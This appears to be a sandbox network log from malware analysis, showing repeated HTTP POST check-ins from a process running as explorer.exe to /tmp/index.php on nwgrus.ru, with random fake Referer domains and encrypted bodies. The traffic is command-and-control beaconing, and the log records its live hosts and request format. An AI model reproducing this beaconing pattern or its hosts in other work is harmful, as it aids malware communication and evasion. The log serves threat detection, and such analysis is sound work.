                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 49750 | 180.75.11.133 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 03:14:40.302452087 CEST | 283 | OUT | POST /tmp/index.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: http://iwmxjihevykqvbos.net/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 367
                                                                                                                                      Host: nwgrus.ru
Oct 8, 2024 03:14:40.305581093 CEST | 367 | OUT | Data Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 37 1a b7 b7
                                                                                                                                      Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA -[k,vu7GykKB}W6:fC[}xN0X=%-MB7\s)8A1)Uj[6#eB*JU<Mw8T9p
Oct 8, 2024 03:14:41.686357021 CEST | 137 | IN | HTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.26.0
                                                                                                                                      Date: Tue, 08 Oct 2024 01:14:41 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 49751 | 180.75.11.133 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 03:14:41.694941998 CEST | 281 | OUT | POST /tmp/index.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: http://lxadwtocjtceer.com/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 213
                                                                                                                                      Host: nwgrus.ru
Oct 8, 2024 03:14:41.694969893 CEST | 213 | OUT | Data Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 2e 19 ce 86
                                                                                                                                      Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA -[k,vu.~]Cm@UueZ_z"b^hm46+?Nl9!UO+#q1606*P>&$*W+
Oct 8, 2024 03:14:43.070204020 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx/1.26.0
                                                                                                                                      Date: Tue, 08 Oct 2024 01:14:42 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close
                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 49752 | 180.75.11.133 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 03:14:43.077734947 CEST | 282 | OUT | POST /tmp/index.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: http://hvtgqqwlcbupjdi.org/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 194
                                                                                                                                      Host: nwgrus.ru
Oct 8, 2024 03:14:43.077768087 CEST | 194 | OUT | Data Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 4d 54 de 8e
                                                                                                                                      Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA -[k,vuMTIGQAgb0\C1r=lb@WYS=Lhk7M:$gj)xWmk>
Oct 8, 2024 03:14:44.453233957 CEST | 137 | IN | HTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.26.0
                                                                                                                                      Date: Tue, 08 Oct 2024 01:14:44 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 49753 | 180.75.11.133 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 03:14:44.486186981 CEST | 280 | OUT | POST /tmp/index.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: http://cestfyhpiwlpo.org/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 200
                                                                                                                                      Host: nwgrus.ru
Oct 8, 2024 03:14:44.489777088 CEST | 200 | OUT | Data Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 61 3f aa 9e
                                                                                                                                      Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA -[k,vua?L_M+~!&|@eXL~U$p#Z8KbI:|gPul&{SyB
Oct 8, 2024 03:14:46.078051090 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx/1.26.0
                                                                                                                                      Date: Tue, 08 Oct 2024 01:14:45 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close
                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Oct 8, 2024 03:14:46.353574038 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx/1.26.0
                                                                                                                                      Date: Tue, 08 Oct 2024 01:14:45 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close
                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID: 18 | Source IP: 192.168.2.4 | Source Port: 49754 | Destination IP: 180.75.11.133 | Destination Port: 80 | PID: 2580 | Process: C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 03:14:46.353887081 CEST | 279 | OUT | POST /tmp/index.php HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://qocskrvscrey.org/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 158
    Host: nwgrus.ru
Oct 8, 2024 03:14:46.353938103 CEST | 158 | OUT | Data Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 54 2c a5 a4
    Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA -[k,vuT,d^yFw1)mi*5WFKR8Wv;3
Oct 8, 2024 03:14:47.954217911 CEST | 484 | IN | HTTP/1.1 404 Not Found
    Server: nginx/1.26.0
    Date: Tue, 08 Oct 2024 01:14:47 GMT
    Content-Type: text/html; charset=utf-8
    Connection: close
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID: 19 | Source IP: 192.168.2.4 | Source Port: 49755 | Destination IP: 180.75.11.133 | Destination Port: 80 | PID: 2580 | Process: C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 03:14:47.961740017 CEST | 281 | OUT | POST /tmp/index.php HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://tcqfwxekwxifmk.net/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 346
    Host: nwgrus.ru
Oct 8, 2024 03:14:47.961771965 CEST | 346 | OUT | Data Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 2d 0f fb b8
    Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA -[k,vu-M)OYp92;o5_&W/%L#&1fN8f~B@}0f.v5DemxvWGzl5=w
Oct 8, 2024 03:14:49.383939028 CEST | 137 | IN | HTTP/1.1 200 OK
    Server: nginx/1.26.0
    Date: Tue, 08 Oct 2024 01:14:49 GMT
    Content-Type: text/html; charset=utf-8
    Connection: close


Session ID: 20 | Source IP: 192.168.2.4 | Source Port: 49756 | Destination IP: 180.75.11.133 | Destination Port: 80 | PID: 2580 | Process: C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 03:14:49.391505957 CEST | 283 | OUT | POST /tmp/index.php HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://qhndxwhkmipxgbaj.org/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 122
    Host: nwgrus.ru
Oct 8, 2024 03:14:49.391505957 CEST | 122 | OUT | Data Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 19 6b 2c 90 f5 76 0b 75 78 35 dd 9c
    Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA -[k,vux5DEp.h-yjf0
Oct 8, 2024 03:14:50.821456909 CEST | 484 | IN | HTTP/1.1 404 Not Found
    Server: nginx/1.26.0
    Date: Tue, 08 Oct 2024 01:14:50 GMT
    Content-Type: text/html; charset=utf-8
    Connection: close
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID: 21 | Source IP: 192.168.2.4 | Source Port: 49758 | Destination IP: 180.75.11.133 | Destination Port: 80 | PID: 2580 | Process: C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 03:14:50.829643011 CEST | 278 | OUT | POST /tmp/index.php HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://awkedsxfgif.org/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 221
    Host: nwgrus.ru
Oct 8, 2024 03:14:50.829658031 CEST | 221 | OUT | Data Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1e 6b 2c 90 f5 76 0b 75 56 2d d4 90
    Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA -[k,vuV-^jkRqogFtSe##JDYD_(Q!@aZ9X+!8!Z5xQ-k8L?#[w
Oct 8, 2024 03:14:52.231482983 CEST | 484 | IN | HTTP/1.1 404 Not Found
    Server: nginx/1.26.0
    Date: Tue, 08 Oct 2024 01:14:51 GMT
    Content-Type: text/html; charset=utf-8
    Connection: close
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID: 22 | Source IP: 192.168.2.4 | Source Port: 49759 | Destination IP: 180.75.11.133 | Destination Port: 80 | PID: 2580 | Process: C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 03:14:52.243201971 CEST | 278 | OUT | POST /tmp/index.php HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://xnrwcbelwfy.com/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 120
    Host: nwgrus.ru
Oct 8, 2024 03:14:52.243201971 CEST | 120 | OUT | Data Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1f 6b 2c 90 f5 76 0b 75 70 18 b9 92
    Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA -[k,vupo?ZZeeBZxwgoZa
Oct 8, 2024 03:14:53.618547916 CEST | 484 | IN | HTTP/1.1 404 Not Found
    Server: nginx/1.26.0
    Date: Tue, 08 Oct 2024 01:14:53 GMT
    Content-Type: text/html; charset=utf-8
    Connection: close
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID: 23 | Source IP: 192.168.2.4 | Source Port: 49760 | Destination IP: 180.75.11.133 | Destination Port: 80 | PID: 2580 | Process: C:\Windows\explorer.exe

